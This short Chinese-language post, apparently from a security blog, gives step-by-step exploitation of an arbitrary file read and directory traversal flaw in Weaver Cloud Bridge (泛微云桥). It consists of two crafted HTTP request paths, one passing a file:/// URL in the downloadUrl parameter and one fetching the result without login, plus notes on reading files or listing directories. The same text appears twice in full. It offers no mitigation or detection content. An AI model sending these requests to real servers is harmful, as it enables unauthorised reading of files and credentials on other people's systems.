上一篇文章:泛微云桥任意文件读取漏洞
利用方式:
第一步:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
第二步:
/file/fileNoLogin/id
注:
downloadUrl参数填写文件的绝对路径时,可以造成任意文件读取;
downloadUrl参数填写目录的绝对路径时,可以造成目录遍历。
上一篇文章:泛微云桥任意文件读取漏洞
利用方式:
第一步:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
第二步:
/file/fileNoLogin/id
注:
downloadUrl参数填写文件的绝对路径时,可以造成任意文件读取;
downloadUrl参数填写目录的绝对路径时,可以造成目录遍历。